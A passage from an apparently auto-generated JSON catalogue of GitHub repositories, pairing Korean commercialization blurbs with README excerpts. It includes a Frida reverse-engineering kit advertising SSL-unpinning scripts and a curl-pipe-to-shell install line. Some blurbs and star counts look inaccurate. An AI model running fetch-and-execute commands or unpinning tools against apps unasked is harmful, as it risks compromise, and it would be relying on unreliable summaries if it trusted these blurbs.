CreditTone/hooker 분석 보고서\n\n## 왜 보물인가\n웹 요청을 자동으로 가로채고 조작할 수 있는 도구로, 개발자들이 복잡한 작업을 간단하게 자동화할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n- **API 모니터링 SaaS**: 기업의 웹 통신을 실시간으로 감시하고 문제를 자동 감지하는 구독형 서비스\n- **내부 업무 자동화 도구**: ","readme_excerpt":"[![MseeP.ai Security Assessment Badge](https://mseep.net/pr/credittone-hooker-badge.png)](https://mseep.ai/app/credittone-hooker)\n\n免责声明\n本项目的所有内容仅供学习与技术交流使用，旨在帮助开发者理解移动应用的结构和工作原理。\n\n本项目不包含任何针对特定应用的破解操作或侵权内容。\n针对某些app存在的简单解包技术内容在各大技术论坛网站均大量存在，并无对这些app造成实际损害\n本项目无意协助任何非法用途，包括但不限于绕过版权保护、修改应用功能或获取未经授权的数据。\n请确保在使用本项目工具时遵守相关法律法规，并仅用于个人学习或研究目的。\n\n<p>简体中文 | <a href=\"README_EN.md\">English</a></p>\n\n# 欢迎使用hooker逆向工作台\n![GitHub stars](https://img.shields.io/github/stars/CreditTone/hooker?style=flat-square)\n![GitHub forks](https://img.shields.io/github/forks/CreditTone/hooker?style=flat-square)\n![GitHub code size](https://img.shields.io/github/languages/code-size/CreditTone/hooker?style=flat-square)\n![Python](https://img.shields.io/badge/python-3.8.8-blue?style=flat-square)\n![frida](https://img.shields.io/badge/frida-16.7.19-blue?style=flat-square)\n\nhooker是一个基于frida实现的逆向工具包。旨在为安卓逆向开发人员提供一个舒适的命令行界面和一些常用的通杀脚本、自动化生成hook脚本、内存漫游探测activity和service、frida版JustTrustMe、boringssl unpinning全网app通杀\n\n\n\n为什么你需要hooker？\n==","composite_score":0.0551,"license_safety_tag":"unknown"},{"name":"tonquer/picacg-qt","github_url":"https://github.com/tonquer/picacg-qt","stars":9,"language":"Python","license":"LGPL-3.0","abandonment_months":3,"description":"# tonquer/picacg-qt 상용화 분석\n\n## 왜 보물인가\n이미지 뷰어 애플리케이션으로, 사용자 친화적인 인터페이스로 콘텐츠를 관리하고 감상할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **디지털 콘텐츠 관리 SaaS**: 웹 기반 이미지 라이브러리 플랫폼으로 개발하여 개인/기업 사용자에게 구독 서비스 제공\n2. **출판사/에이전시 내","readme_excerpt":"# 哔咔漫画\n\n## 简体中文 | [English](README_EN.md)\n\n[![GitHub](https://img.shields.io/github/license/tonquer/picacg-qt)](https://raw.githubusercontent.com/tonquer/picacg-qt/master/LICENSE.txt)\n[![GitHub](https://img.shields.io/github/workflow/status/tonquer/picacg-qt/CI?label=CI)](https://github.com/tonquer/picacg-qt/actions)\n![Relese](https://img.shields.io/badge/Python-3.9.13%2B-brightgreen)\n[![Relese](https://img.shields.io/github/v/release/tonquer/picacg-qt)](https://github.com/tonquer/picacg-qt/releases)\n![Relese](https://img.shields.io/github/downloads/tonquer/picacg-qt/total)\n\n- 哔咔漫画PC客户端（支持window、Linux和macOS），界面使用QT\n- 该项目仅供技术研究使用，请勿用于其他用途\n- 如果觉得本项目对你有所帮助，请点个star关注，感谢支持\n- 如有使用中遇到问题，欢迎提ISSUE\n\n## 功能\n- 已实现哔咔漫画大部分功能\n- 支持看图和下载\n\n## 如何使用\n  ### Windows (测试使用win10)\n  1. 下载最新的版本 https://github.com/tonquer/picacg-qt/releases\n  2. 解压zip\n  3. 打开start.exe\n  4. 后续有更新，只需要下载最新版本覆盖原目录即可\n  5. 如果无法初始化Waifu2x, DLL错误, 请安装 [Vs运行库](https://download.visualstudio.microsoft.com/download/pr/366c0fb9-fe05-4b58-949a-","composite_score":0.055,"license_safety_tag":"restricted"},{"name":"expressjs/multer","github_url":"https://github.com/expressjs/multer","stars":7,"language":"JavaScript","license":"mit","abandonment_months":1,"description":"# Multer 저장소 분석\n\n## 왜 보물인가\n웹사이트에서 사진이나 파일을 업로드할 때 안전하고 효율적으로 처리해주는 필수 도구로, 전 세계 수백만 개 웹사이트가 의존하고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 저장소(구글 드라이브 같은) 서비스에서 파일 업로드 기능 담당\n2. **내부 업무 도구**: 회사 직원들이 ","readme_excerpt":"# Multer [![NPM Version][npm-version-image]][npm-url] [![NPM Downloads][npm-downloads-image]][npm-url] [![Build Status][ci-image]][ci-url] [![Test Coverage][test-image]][test-url] [![OpenSSF Scorecard Badge][ossf-scorecard-badge]][ossf-scorecard-visualizer]\n\nMulter is a node.js middleware for handling `multipart/form-data`, which is primarily used for uploading files. It is written\non top of [busboy](https://github.com/mscdex/busboy) for maximum efficiency.\n\n**NOTE**: Multer will not process any form which is not multipart (`multipart/form-data`).\n\n## Translations\n\nThis README is also available in other languages:\n\n|                                                                                |                 |\n| ------------------------------------------------------------------------------ | --------------- |\n| [العربية](https://github.com/expressjs/multer/blob/main/doc/README-ar.md)      | Arabic          |\n| [简体中文](https://github.com/expressjs/multer/blob/main/doc/README-zh-cn.md","composite_score":0.0549,"license_safety_tag":"safe"},{"name":"microsoft/react-flow-editor","github_url":"https://github.com/microsoft/react-flow-editor","stars":8,"language":"TypeScript","license":"MIT","abandonment_months":3,"description":"# React Flow Editor 분석\n\n## 왜 보물인가\n복잡한 업무 흐름을 마우스로 그려서 자동화할 수 있는 도구로, 코딩 없이도 프로세스를 시각화하고 관리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **업무 자동화 SaaS**: 회사의 승인 절차나 데이터 처리 흐름을 누구나 쉽게 만들 수 있는 웹 서비스\n- **내부 업무 도구**: 대기업의 HR","readme_excerpt":"# Work in progress\n\n# react-dag-editor\n\n[![License](https://img.shields.io/github/license/microsoft/react-dag-editor)](https://github.com/microsoft/react-dag-editor/blob/main/LICENSE)\n[![npm version](https://badge.fury.io/js/react-dag-editor.svg)](https://www.npmjs.com/package/react-dag-editor)\n[![Downloads](https://img.shields.io/npm/dm/react-dag-editor.svg)](https://www.npmjs.com/package/react-dag-editor)\n\n[Try it out!](https://microsoft.github.io/react-dag-editor/)\n\n## Overview\n\nReact component to create graphic user interface with:\n\n- draggable nodes with ports and edges on a directed graph editor.\n- extensibility to customize the widgets or behaviors.\n- accessbility and testability support\n\n## About the name \"react-dag-editor\"\n\n- react: it is a react component created from scratch.\n- dag: directed acyclic graph editor. Our a11y solution assumes the graph is a DAG. If you intend to turn off the a11y features, it is fine to draw undirected or cyclic graph with this component.\n- edit","composite_score":0.0549,"license_safety_tag":"safe"},{"name":"nikitavoloboev/my-mac-os","github_url":"https://github.com/nikitavoloboev/my-mac-os","stars":5,"language":"Rust","license":"MIT","abandonment_months":1,"description":"# my-mac-os 저장소 분석\n\n## 왜 보물인가\n맥 사용자들이 자신의 컴퓨터를 효율적으로 설정하고 관리하는 방법을 한곳에서 배울 수 있는 실용적인 가이드입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 맥 설정 자동화 플랫폼**\n사용자가 몇 클릭으로 자신의 맥을 저장소의 최적 설정으로 자동 구성해주는 웹 서비스로 제공할 수 있습니다.\n\n","readme_excerpt":"# [flow](https://myflow.sh)\n\n> Everything you need to move your project faster\n\n## Install\n\nInstall the latest release (macOS/Linux):\n\n```sh\ncurl -fsSL https://myflow.sh/install.sh | sh\n```\n\nThen run:\n\n```sh\n~/.flow/bin/f --version\n~/.flow/bin/f doctor\n```\n\nIf `f` is not found by name immediately, open a new shell (`exec zsh -l` on zsh).\n\nThe installer verifies SHA-256 checksums when available. If you are installing a legacy release\nthat doesn't ship `checksums.txt`, it will warn and continue (GitHub download only). To bypass\nverification explicitly (not recommended), set `FLOW_INSTALL_INSECURE=1`.\n\n## Upgrade\n\nUpgrade to the latest release:\n\n```sh\nf upgrade\n```\n\nUpgrade to the latest canary build:\n\n```sh\nf upgrade --canary\n```\n\nSwitch back to stable:\n\n```sh\nf upgrade --stable\n```\n\nIf you fork Flow (or publish releases under a different repo), set:\n\n- `FLOW_UPGRADE_REPO=owner/repo`\n- `FLOW_GITHUB_TOKEN` (or `GITHUB_TOKEN` / `GH_TOKEN`) to avoid GitHub API rate limits\n\nIf you are upgrad","composite_score":0.0546,"license_safety_tag":"safe"},{"name":"morpheusthewhite/spicetify-themes","github_url":"https://github.com/morpheusthewhite/spicetify-themes","stars":9,"language":"CSS","license":"MIT","abandonment_months":0,"description":"# Spicetify Themes 저장소 분석\n\n## 왜 보물인가\n음악 스트리밍 앱의 외형을 자유롭게 꾸밀 수 있는 디자인 패키지 모음으로, 기술에 관심 있는 사용자들이 자신의 취향대로 앱을 커스터마이징할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 음악 스트리밍 플랫폼에서 테마 마켓플레이스를 운영하며 사용자별 월 구독료로 ","readme_excerpt":"# Spicetify community themes\n\nThis is a collection of themes for [spicetify](https://github.com/spicetify/spicetify-cli), a command-line tool to customize Spotify.\n\n### **You can find a preview of all the themes in [THEMES.md](./THEMES.md).**\n\n## Notes:\n\n*   **These themes require that you have the latest version of Spotify and Spicetify.**\n*   **To install Dribbblish and Turntable themes, follow the instructions in their READMEs**.\n*   **Spotify ad-blocked version is not supported.**\n\n## Installation and usage\n\n(If you use Arch Linux you can find this project on the [AUR](https://aur.archlinux.org/packages/spicetify-themes-git/))\n\n1.  Clone this repository. Make sure [git](https://git-scm.com/) is installed and run:\n    ```bash\n    git clone --depth=1 https://github.com/spicetify/spicetify-themes.git \n    ```\n\n2.  Copy the files into the [Spicetify Themes folder](https://spicetify.app/docs/development/themes). Run:\n\n    **Linux**\n\n    ```bash\n    cd spicetify-themes\n    cp -r * ~/.con","composite_score":0.0544,"license_safety_tag":"safe"},{"name":"Signal-Execution-Core/pumpfun-bundler-bot","github_url":"https://github.com/Signal-Execution-Core/pumpfun-bundler-bot","stars":63,"language":"TypeScript","license":"NOASSERTION","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.0542,"license_safety_tag":"unknown"},{"name":"docker-slim/docker-slim","github_url":"https://github.com/docker-slim/docker-slim","stars":12,"language":"Go","license":"Apache-2.0","abandonment_months":1,"description":"# docker-slim/docker-slim 분석\n\n## 왜 보물인가\n컴퓨터 프로그램을 실행하는 데 필요한 파일들만 골라내서 불필요한 것들을 제거해 주는 도구로, 프로그램을 더 빠르고 안전하게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 인프라 서비스**: 기업들이 프로그램을 클라우드에 올릴 때 용량을 줄여 비용을 절감하는 SaaS로 ","readme_excerpt":"![SK](assets/images/dslim/logo.png)\n\n[![Gitter chat](https://img.shields.io/badge/chat-on%20gitter-brightgreen.svg?style=for-the-badge)](https://gitter.im/docker-slim/community)\n[![Discord chat](https://img.shields.io/static/v1.svg?label=chat&message=on%20discord&color=7389D8&style=for-the-badge)](https://discord.gg/9tDyxYS)\n[![Follow](https://img.shields.io/badge/follow-on%20twitter-%231DA1F2.svg?style=for-the-badge&logoColor=white)](https://twitter.com/DockerSlim)\n[![Youtube](https://img.shields.io/badge/-YouTube-red?style=for-the-badge&logo=youtube&logoColor=white)](https://www.youtube.com/channel/UCy7RHjJlaBhpCCbChrd8POA?sub_confirmation=1)\n\n[![Gitpod ready-to-code](https://img.shields.io/badge/Gitpod-ready--to--code-908a85?logo=gitpod&style=for-the-badge)](https://gitpod.io/#https://github.com/slimtoolkit/slim)\n\n[![Install SlimToolkit](https://img.shields.io/badge/install-slim-blue?style=for-the-badge)](https://github.com/slimtoolkit/slim#installation)\n[![Get Examples](https://img","composite_score":0.054,"license_safety_tag":"safe"},{"name":"vozlt/nginx-module-vts","github_url":"https://github.com/vozlt/nginx-module-vts","stars":10,"language":"C","license":"bsd-2-clause","abandonment_months":3,"description":"# nginx-module-vts 가치 분석\n\n## 왜 보물인가\n웹사이트의 트래픽 통계를 자동으로 측정해주는 도구로, 서버 운영자가 방문객 현황을 실시간으로 파악할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **웹호스팅 제공 업체의 SaaS**: 고객 서버의 트래픽 모니터링 대시보드를 자동 생성해 추가 요금으로 판매\n2. **API 판매**: 실시간 트","readme_excerpt":"Nginx virtual host traffic status module\n==========\n\n[![CI](https://github.com/vozlt/nginx-module-vts/actions/workflows/ci.yml/badge.svg)](https://github.com/vozlt/nginx-module-vts/actions/workflows/ci.yml)\n[![License](http://img.shields.io/badge/license-BSD-brightgreen.svg)](https://github.com/vozlt/nginx-module-vts/blob/master/LICENSE)\n\nNginx virtual host traffic status module\n\nTable of Contents\n=================\n\n* [Version](#version)\n* [Test](#test)\n* [Dependencies](#dependencies)\n* [Compatibility](#compatibility)\n* [Screenshots](#screenshots)\n* [Installation](#installation)\n* [Synopsis](#synopsis)\n* [Description](#description)\n* [Calculations and Intervals](#calculations-and-intervals)\n* [Control](#control)\n  * [To get status of traffic zones on the fly](#to-get-status-of-traffic-zones-on-the-fly)\n    * [To get fully zones](#to-get-fully-zones)\n    * [To get group zones](#to-get-group-zones)\n    * [To get each zones](#to-get-each-zones)\n  * [To reset traffic zones on the fly](#to-","composite_score":0.0538,"license_safety_tag":"safe"},{"name":"gka/chroma.js","github_url":"https://github.com/gka/chroma.js","stars":6,"language":"JavaScript","license":"NOASSERTION","abandonment_months":3,"description":"# gka/chroma.js 보물 분석\n\n## 왜 보물인가\n색상(색깔) 관련 작업을 쉽게 처리해주는 도구로, 디자인이나 이미지 작업이 필요한 많은 서비스에서 필수적으로 활용될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 디자인 도구 SaaS**: 사용자가 색상을 조정·변환·조화시키는 웹 기반 디자인 플랫폼\n2. **전자상거래 상품 이미지 처리*","readme_excerpt":"# Chroma.js\n\n[Chroma.js](https://vis4.net/chromajs/) is a ~~tiny~~ [small-ish](https://bundlejs.com/?q=chroma-js) zero-dependency JavaScript library for all kinds of color conversions and color scales.\n\n[![Build Status](https://api.travis-ci.com/gka/chroma.js.svg?branch=master)](https://travis-ci.com/gka/chroma.js)\n[![Build size](https://deno.bundlejs.com/?q=chroma-js&badge)](https://bundlejs.com/?q=chroma-js)\n\n\n\n### Usage\n\nInstall from npm\n\n```\nnpm install chroma-js\n```\n\nImport package into project\n\n```javascript\nimport chroma from \"chroma-js\";\n```\n\nInitiate and manipulate colors:\n\n```javascript\nchroma('#D4F880').darken().hex();  // #a1c550\n```\n\nWorking with color scales is easy, too:\n\n```javascript\nscale = chroma.scale(['white', 'red']);\nscale(0.5).hex(); // #FF7F7F\n```\n\nLab/Lch interpolation looks better than RGB\n\n```javascript\nchroma.scale(['white', 'red']).mode('lab');\n```\n\nCustom domains! Quantiles! Color Brewer!!\n\n```javascript\nchroma.scale('RdYlBu').domain(myValues, 7, 'quantil","composite_score":0.0537,"license_safety_tag":"unknown"},{"name":"facebook/graphql","github_url":"https://github.com/facebook/graphql","stars":7,"language":"JavaScript","license":"NOASSERTION","abandonment_months":1,"description":"# facebook/graphql 저장소 분석\n\n## 왜 보물인가\nFacebook이 만든 공식 GraphQL 기술로, 웹사이트와 앱에서 필요한 정보를 효율적으로 주고받을 수 있는 국제 표준 규격입니다.\n\n## 어디에 쓸 수 있나\n1. **API 판매**: GraphQL 기반 데이터 조회 서비스를 유료로 제공하는 비즈니스\n2. **SaaS 서비스**: 복잡한","readme_excerpt":"[![The query language for modern APIs](./assets/banner.png)](https://graphql.org/)\n\n# GraphQL\n\n<img alt=\"GraphQL Logo\" align=\"right\" src=\"https://graphql.org/img/logo.svg\" width=\"15%\" />\n\nThe GraphQL specification is edited in the markdown files found in\n[`/spec`](./spec) the latest release of which is published at\nhttps://graphql.github.io/graphql-spec/.\n\nThe latest draft specification can be found at\nhttps://graphql.github.io/graphql-spec/draft/ which tracks the latest commit to\nthe main branch in this repository.\n\nPrevious releases of the GraphQL specification can be found at permalinks that\nmatch their [release tag](https://github.com/graphql/graphql-spec/releases). For\nexample, https://graphql.github.io/graphql-spec/October2016/. If you are linking\ndirectly to the GraphQL specification, it's best to link to a tagged permalink\nfor the particular referenced version.\n\n## Overview\n\nThis is a Working Draft of the Specification for GraphQL, a query language for\nAPIs created by Facebook.","composite_score":0.0536,"license_safety_tag":"unknown"},{"name":"gakonst/foundry","github_url":"https://github.com/gakonst/foundry","stars":6,"language":"","license":"Apache-2.0","abandonment_months":3,"description":"# Foundry 저장소 분석\n\n## 왜 보물인가\n스마트 계약(블록체인 프로그램)을 더 쉽고 빠르게 만들 수 있는 도구로, 암호화폐 관련 기업들이 반드시 필요로 하는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **블록체인 개발 플랫폼 SaaS**: 스타트업 개발자들이 클라우드 기반으로 스마트 계약을 작성·테스트하는 구독 서비스\n2. **엔터프라이즈","readme_excerpt":"<div align=\"center\">\n  <img src=\".github/assets/banner.png\" alt=\"Foundry banner\" />\n\n&nbsp;\n\n[![Github Actions][gha-badge]][gha-url] [![Telegram Chat][tg-badge]][tg-url] [![Telegram Support][tg-support-badge]][tg-support-url]\n![Foundry](https://img.shields.io/badge/Foundry-grey?style=flat&logo=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAYAAACNiR0NAAAElElEQVR4nH1VUUhUaRg9984YdzBpkqR0Z210rIESIXSabEbcHgydrpNRRj00kWaztj0U1MOW0MOIbD300IvLMqBpMTGYxdoqyoRNDUESBDWwUuPugCSSsTM7u0Oj1/+efdiMcmnP2/fDd77D4f/OB6xCa2urQZbllVICYGtqanK1tLS4AdgAyAAgyzJaW1sNq/ulT4twOGw4fPiwAGDp7Ow8VV1d7bVarRWxWCw/k8mgsbExm0wmZ+Lx+M/Xr1//CcAsSVmSJH01McLhsAEAnE5nx+Tk5B/xeJxOp5N9fX2sqqqixWLhnTt36HA4GIvFGI1GU3V1df5Pe/9D1t7eHkgkEuzo6GBPT49WWloq7Ha7fujQITocDu7atUs3m83i6tWr2okTJ/jixQuePn265zPScDhskGUZe/fubXv8+DFv3rypbdiwQaxbt46RSIT79u3j0NAQb926RVVVOT4+TqvVyvz8fD0YDC5NTk6ysbHxlCRJ/5KSlAAURyKRTFNTkwAg7t69S5/Px76+Pq7GyMgI9+/fz9HRUQIQO3bsEKOjo38DsJCUJADw+/0BVVW7otHo8ps3b4yvXr3CxMQETCYTTCYTNE0DAOTl5SGXy0FRFOzZswdmsxkVFRX","composite_score":0.0536,"license_safety_tag":"safe"},{"name":"cyrus-and/chrome-remote-interface","github_url":"https://github.com/cyrus-and/chrome-remote-interface","stars":5,"language":"JavaScript","license":"mit","abandonment_months":4,"description":"# Chrome Remote Interface 저장소 분석\n\n## 왜 보물인가\n구글 크롬 브라우저를 원격으로 제어할 수 있는 도구로, 자동화된 웹 테스트나 스크린샷 촬영 같은 반복 작업을 프로그래밍으로 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **웹 자동 테스트 서비스**: 기업의 웹사이트가 제대로 작동하는지 자동으로 확인해주는 SaaS 플랫","readme_excerpt":"# chrome-remote-interface\n\n[![CI status](https://github.com/cyrus-and/chrome-remote-interface/actions/workflows/ci.yml/badge.svg)](https://github.com/cyrus-and/chrome-remote-interface/actions?query=workflow:CI)\n\n[Chrome Debugging Protocol] interface that helps to instrument Chrome (or any\nother suitable [implementation](#implementations)) by providing a simple\nabstraction of commands and notifications using a straightforward JavaScript\nAPI.\n\n## Sample API usage\n\nThe following snippet loads `https://github.com` and dumps every request made:\n\n```js\nconst CDP = require('chrome-remote-interface');\n\nasync function example() {\n    let client;\n    try {\n        // connect to endpoint\n        client = await CDP();\n        // extract domains\n        const {Network, Page} = client;\n        // setup handlers\n        Network.requestWillBeSent((params) => {\n            console.log(params.request.url);\n        });\n        // enable events then start!\n        await Network.enable();\n        await Pag","composite_score":0.0534,"license_safety_tag":"safe"},{"name":"deepmind/mathematics_conjectures","github_url":"https://github.com/deepmind/mathematics_conjectures","stars":31,"language":"Jupyter Notebook","license":"apache-2.0","abandonment_months":3,"description":"# DeepMind Mathematics Conjectures 저장소 분석\n\n## 왜 보물인가\n인공지능이 풀지 못한 수학의 난제들을 체계적으로 정리한 자료로, AI 연구자들이 새로운 알고리즘 개발의 테스트베드로 활용할 수 있는 귀중한 벤치마크 모음입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 교육용 SaaS 플랫폼**\n수학 애호가와 대학생을 위한 구독형 문","readme_excerpt":"# Advancing mathematics by guiding human intuition with AI\n\nThis repo contains two [colab](https://research.google.com/colaboratory/)\nnotebooks which accompany the paper, available online at https://www.nature.com/articles/s41586-021-04086-x\n\nBoth the representation theory and knot theory colabs retrain an ML model from\nscratch and recreate our published results by our same intermediary steps.\n\n## Installation\n\nNo installation is required; the notebook files can be opened on the Colab site\nfrom a copy of these files uploaded from a local machine, saved in google drive\nor directly from this github repo. Alternatively they can be accessed via these links:\n\n* Knot theory - https://colab.sandbox.google.com/github/deepmind/mathematics_conjectures/blob/main/knot_theory.ipynb\n* Representation theory - https://colab.sandbox.google.com/github/deepmind/mathematics_conjectures/blob/main/representation_theory.ipynb\n\n## Usage\n\nOnce the notebook has loaded, simply follow the comments along and execu","composite_score":0.0531,"license_safety_tag":"safe"},{"name":"alibaba/flutter_boost","github_url":"https://github.com/alibaba/flutter_boost","stars":5,"language":"Dart","license":"MIT","abandonment_months":0,"description":"# Flutter Boost 분석 보고서\n\n## 왜 보물인가\n안드로이드와 iOS 앱 개발 속도를 2배 이상 빠르게 할 수 있는 개발 도구로, 스타트업이 빠른 출시로 경쟁에서 앞설 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 모바일 앱 빠른 개발이 필요한 핀테크, 배달앱, 소셜 서비스 개발사에 구독형으로 제공\n- **내부 업무 도구*","readme_excerpt":"<p align=\"center\">\n  <img src=\"flutter_boost.png\">\n   <b></b><br>\n  <a href=\"README_CN.md\">中文文档</a>\n  <a href=\"https://zhuanlan.zhihu.com/p/362662962\">中文介绍</a>\n</p>\n\n# Release Note\n\n## [ohos] New Platform\nflutter_boost has been fully adapted for the ohos platform. Please refer to item 10 of the following document to understand the related conventions before integrating：\n<a href=\"Frequently Asked Question.md\">FAQ</a>\n\n## 4.6.5\n\nPS：Null-safety is already supported.\n\n- Flutter SDK upgrades do not require Boost upgrades\n- Simplify the architecture\n- Simplify the interface\n- Unified design of double-end interface\n- Solved the Top Issue\n- Android does not need to distinguish between AndroidX and Support\n\n# FlutterBoost\nA next-generation Flutter-Native hybrid solution. FlutterBoost is a Flutter plugin which enables hybrid integration of Flutter for your existing native apps with minimum efforts. The philosophy of FlutterBoost is to use Flutter as easy as using a WebView. Managing Native pages","composite_score":0.053,"license_safety_tag":"safe"},{"name":"spatie/laravel-medialibrary","github_url":"https://github.com/spatie/laravel-medialibrary","stars":7,"language":"PHP","license":"mit","abandonment_months":1,"description":"# Laravel Media Library 비즈니스 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 사진, 동영상 같은 파일을 쉽게 관리할 수 있게 해주는 필수 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **전자상거래 플랫폼**: 상품 이미지를 자동으로 여러 크기로 변환해 빠르게 로딩하는 기능\n2. **클라우드 저장소 서비스**: 사용자가 업로드한 사진과 동영","readme_excerpt":"<div align=\"left\">\n    <a href=\"https://spatie.be/open-source?utm_source=github&utm_medium=banner&utm_campaign=laravel-medialibrary\">\n      <picture>\n        <source media=\"(prefers-color-scheme: dark)\" srcset=\"https://spatie.be/packages/header/laravel-medialibrary/html/dark.webp\">\n        <img alt=\"Logo for laravel-medialibrary\" src=\"https://spatie.be/packages/header/laravel-medialibrary/html/light.webp\">\n      </picture>\n    </a>\n\n<h1>Associate files with Eloquent models</h1>\n\n[![Latest Version](https://img.shields.io/github/release/spatie/laravel-medialibrary.svg?style=flat-square)](https://github.com/spatie/laravel-medialibrary/releases)\n[![run-tests](https://github.com/spatie/laravel-medialibrary/actions/workflows/run-tests.yml/badge.svg)](https://github.com/spatie/laravel-medialibrary/actions/workflows/run-tests.yml)\n[![Total Downloads](https://img.shields.io/packagist/dt/spatie/laravel-medialibrary.svg?style=flat-square)](https://packagist.org/packages/spatie/laravel-medialibrar","composite_score":0.0525,"license_safety_tag":"safe"},{"name":"tj/git-extras","github_url":"https://github.com/tj/git-extras","stars":7,"language":"Shell","license":"mit","abandonment_months":0,"description":"# tj/git-extras 분석 보고서\n\n## 왜 보물인가\n개발자들이 매일 사용하는 깃(Git)이라는 도구를 더 편리하게 만들어주는 확장 기능 모음입니다.\n\n## 어디에 쓸 수 있나\n\n1. **개발팀 협업 SaaS**: 팀의 코드 관리를 자동화하는 클라우드 서비스에 이 기능들을 통합하여 판매\n2. **회사 내부 개발 도구**: 대기업의 소프트웨어 개발팀이","readme_excerpt":"# Git Extras\n\nLittle git extras.\n\n## Screencasts\n\nJust getting started? Check out these screencasts:\n\n* [introduction](https://vimeo.com/45506445) ([archive.org link](https://web.archive.org/web/20230219181235id_/vod-progressive.akamaized.net/exp=1676834145~acl=%2Fvimeo-prod-skyfire-std-us%2F01%2F4101%2F1%2F45506445%2F107111328.mp4~hmac=065b68f23c4b6a222463097b36d1c346995a9559baa9b819972da95550018471/vimeo-prod-skyfire-std-us/01/4101/1/45506445/107111328.mp4)) -- covers `git-ignore`, `git-setup`, `git-changelog`, `git-release`, `git-effort` and more\n\n## Installation\n\nSee the [Installation](Installation.md) page.\n\n## Commands\n\nGo to the [Commands](Commands.md) page for basic usage and examples.\n\n__GIT utilities__ -- repo summary, repl, changelog population, author commit percentages and more\n\n## Contributing\n\nInterested in contributing? Awesome!\n\nPlease read [Contributing](CONTRIBUTING.md) before you make a PR, thanks!\n\n## The change of the default branch\n\nAs of Git Extras 6.4 the assum","composite_score":0.0525,"license_safety_tag":"safe"},{"name":"antfu/unplugin-vue-components","github_url":"https://github.com/antfu/unplugin-vue-components","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":2,"description":"# unplugin-vue-components 보물 분석\n\n## 왜 보물인가\n웹사이트를 만들 때 자주 쓰는 부품들을 자동으로 불러와주는 도구로, 개발자들의 반복적인 작업을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 웹 기반 대시보드 플랫폼의 개발 속도를 높여서 빠른 신규 기능 출시 가능\n- **내부 업무 도구**: 대기","readme_excerpt":"# unplugin-vue-components\n\n[![NPM version](https://img.shields.io/npm/v/unplugin-vue-components?color=a1b858&label=)](https://www.npmjs.com/package/unplugin-vue-components)\n\nOn-demand components auto importing for Vue.\n\n###### Features\n\n- 💚 Supports Vue 3 out-of-the-box.\n- ✨ Supports both components and directives.\n- ⚡️ Supports Vite, Webpack, Rspack, Rollup, Rolldown, esbuild and more, powered by <a href=\"https://github.com/unjs/unplugin\">unplugin</a>.\n- 🏝 Tree-shakable, only registers the components you use.\n- 🪐 Folder names as namespaces.\n- 🦾 Full TypeScript support.\n- 🌈 [Built-in resolvers](#importing-from-ui-libraries) for popular UI libraries.\n- 😃 Works perfectly with [unplugin-icons](https://github.com/antfu/unplugin-icons).\n\n<br>\n\n<p align=\"center\">\n  <a href=\"https://cdn.jsdelivr.net/gh/antfu/static/sponsors.svg\">\n    <img src='https://cdn.jsdelivr.net/gh/antfu/static/sponsors.svg' alt='Sponsors'/>\n  </a>\n</p>\n\n<br>\n\n## Installation\n\n```bash\nnpm i unplugin-vue-components -D\n``","composite_score":0.0524,"license_safety_tag":"safe"},{"name":"smallnest/rpcx","github_url":"https://github.com/smallnest/rpcx","stars":7,"language":"Go","license":"NOASSERTION","abandonment_months":1,"description":"# rpcx 저장소 분석\n\n## 왜 보물인가\n컴퓨터 간에 데이터를 빠르고 안정적으로 주고받는 통신 시스템으로, 기업의 내부 서비스들을 연결하는 핵심 인프라 역할을 합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 여러 마이크로서비스 기반의 클라우드 플랫폼에서 서버 간 통신 인프라 제공\n- **내부 업무 도구**: 대규모 금융사나 전자상거래 기","readme_excerpt":"- **stable branch**: v1.7.x\n- **development branch**: master\n\n<a href=\"https://rpcx.io/\"><img height=\"160\" src=\"http://rpcx.io/logos/rpcx-logo-text.png\"></a>\n\nOfficial site: [http://rpcx.io](http://rpcx.io/)\n\n[![License](https://img.shields.io/:license-apache%202-blue.svg)](https://opensource.org/licenses/Apache-2.0) [![GoDoc](https://godoc.org/github.com/smallnest/rpcx?status.png)](http://godoc.org/github.com/smallnest/rpcx)  [![github actions](https://github.com/smallnest/rpcx/actions)](https://github.com/smallnest/rpcx/actions/workflows/go.yml/badge.svg) [![Go Report Card](https://goreportcard.com/badge/github.com/smallnest/rpcx)](https://goreportcard.com/report/github.com/smallnest/rpcx) [![coveralls](https://coveralls.io/repos/smallnest/rpcx/badge.svg?branch=master&service=github)](https://coveralls.io/github/smallnest/rpcx?branch=master) [![QQ3群](https://img.shields.io/:QQ3群-953962236-blue.svg)](_documents/rpcx_dev_qq3.jpg) \n\n**Notice: etcd**\n\nsince rpcx 1.7.6, some plugins have ","composite_score":0.0522,"license_safety_tag":"unknown"},{"name":"nEXT-Browser/nEXT","github_url":"https://github.com/nEXT-Browser/nEXT","stars":13,"language":"Common Lisp","license":"unknown","abandonment_months":3,"description":"# nEXT-Browser/nEXT 분석\n\n## 왜 보물인가\n웹 브라우저를 직접 만드는 기술로, 인터넷 창을 제어하는 핵심 도구를 자체 개발할 수 있다는 뜻입니다.\n\n## 어디에 쓸 수 있나\n- **기업용 보안 브라우저**: 회사 직원들이 안전하게 인터넷을 쓸 수 있도록 커스터마이징된 브라우저 판매\n- **특화된 업무 도구**: 금융사나 의료기관처럼 특정 ","readme_excerpt":"* Nyxt browser\n#+html: <img 